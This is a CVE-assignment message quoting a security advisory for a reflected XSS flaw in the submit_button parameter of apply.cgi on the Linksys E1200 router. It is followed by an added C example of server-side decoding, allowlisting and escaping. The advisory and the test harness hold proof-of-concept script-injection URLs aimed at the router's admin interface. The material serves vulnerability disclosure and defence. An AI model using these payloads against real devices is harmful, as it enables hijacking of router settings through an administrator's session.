Mitre has assigned the following CVE for this issue:
CVE-2013-2679
On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict
<theinfinitenigma@gmail.com> wrote:
> Summary
> --------------------
> Software : Cisco/Linksys Router OS
> Hardware : E1200 N300 (others currently untested)
> Version : 2.0.04 (others currently untested)
> Website : http://www.linksys.com
> Issue : Reflected XSS
> Severity : Medium
> Researcher: Carl Benedict (theinfinitenigma)
>
> Product Description
> --------------------
> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.
>
> Details
> --------------------
> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.
>
> Sample URL #1 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27
>
> Sample URL #2 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
>
> History
> --------------------
> 04/26/2013 : Discovery
> 04/27/2013 : Advisory released
>
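A server-side check of the kind the advisory says is missing, as an added example (not Linksys firmware code and not part of the original post): it percent-decodes `submit_button`, rejects anything that is not a plain page name, and hex-escapes whatever is written into the script. Assumptions: the value is reflected inside a single-quoted JavaScript string in an inline script (inferred from the shape of the sample URLs), and the function names, the 32-character limit and the `[A-Za-z0-9_]` allowlist are hypothetical.

```c
/* Added example: hypothetical handler code, not taken from the firmware. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* submit_button values copied from the advisory's Sample URL #1 and #2. */
static const char SAMPLE_1[] =
    "%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27";
static const char SAMPLE_2[] =
    "index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e"
    "%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27";

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Percent-decode src into dst. Returns the decoded length, or -1 on a
 * malformed escape, an embedded NUL byte, or output overflow. */
int url_decode(const char *src, char *dst, size_t cap) {
    size_t n = 0;
    for (; *src; src++) {
        int ch = (unsigned char)*src;
        if (ch == '%') {
            int hi = hexval((unsigned char)src[1]);
            if (hi < 0) return -1;            /* also stops at end of string */
            int lo = hexval((unsigned char)src[2]);
            if (lo < 0) return -1;
            ch = hi * 16 + lo;
            src += 2;
        } else if (ch == '+') {
            ch = ' ';
        }
        if (ch == 0 || n + 1 >= cap) return -1;
        dst[n++] = (char)ch;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Input validation: a page name such as "index" (Sample URL #2) is a plain
 * identifier. The exact allowlist and length limit are assumptions. */
int is_valid_page_name(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 32) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)s[i]) && s[i] != '_') return 0;
    return 1;
}

/* Output encoding for a JavaScript string inside an inline <script>:
 * every byte outside [A-Za-z0-9_] becomes \xHH, so a quote cannot end the
 * string and "</script>" cannot end the script element. */
int js_string_escape(const char *s, char *out, size_t cap) {
    size_t n = 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (isalnum(c) || c == '_') {
            if (n + 1 >= cap) return -1;
            out[n++] = (char)c;
        } else {
            if (n + 4 >= cap) return -1;
            n += (size_t)snprintf(out + n, cap - n, "\\x%02X", (unsigned)c);
        }
    }
    out[n] = '\0';
    return (int)n;
}

/* Build the script line that reflects the parameter. Returns 0 on success,
 * -1 when the request must be rejected and nothing reflected.
 * The variable name in the generated script is hypothetical. */
int render_submit_button(const char *raw_value, char *out, size_t cap) {
    char decoded[128], escaped[512];
    if (url_decode(raw_value, decoded, sizeof decoded) < 0) return -1;
    if (!is_valid_page_name(decoded)) return -1;
    /* Defense in depth: still safe if the allowlist is loosened later. */
    if (js_string_escape(decoded, escaped, sizeof escaped) < 0) return -1;
    int w = snprintf(out, cap, "var submit_button = '%s';", escaped);
    return (w < 0 || (size_t)w >= cap) ? -1 : 0;
}

int main(void) {
    const char *inputs[] = { "index", SAMPLE_1, SAMPLE_2 };
    char line[128];
    for (size_t i = 0; i < 3; i++) {
        if (render_submit_button(inputs[i], line, sizeof line) == 0)
            printf("200 %s\n", line);
        else
            printf("400 rejected: %.20s...\n", inputs[i]);
    }
    return 0;
}
```

Validation and encoding are kept as separate steps because they fail differently: the allowlist rejects the request outright, while the encoder keeps the output inert if a later change accepts more characters.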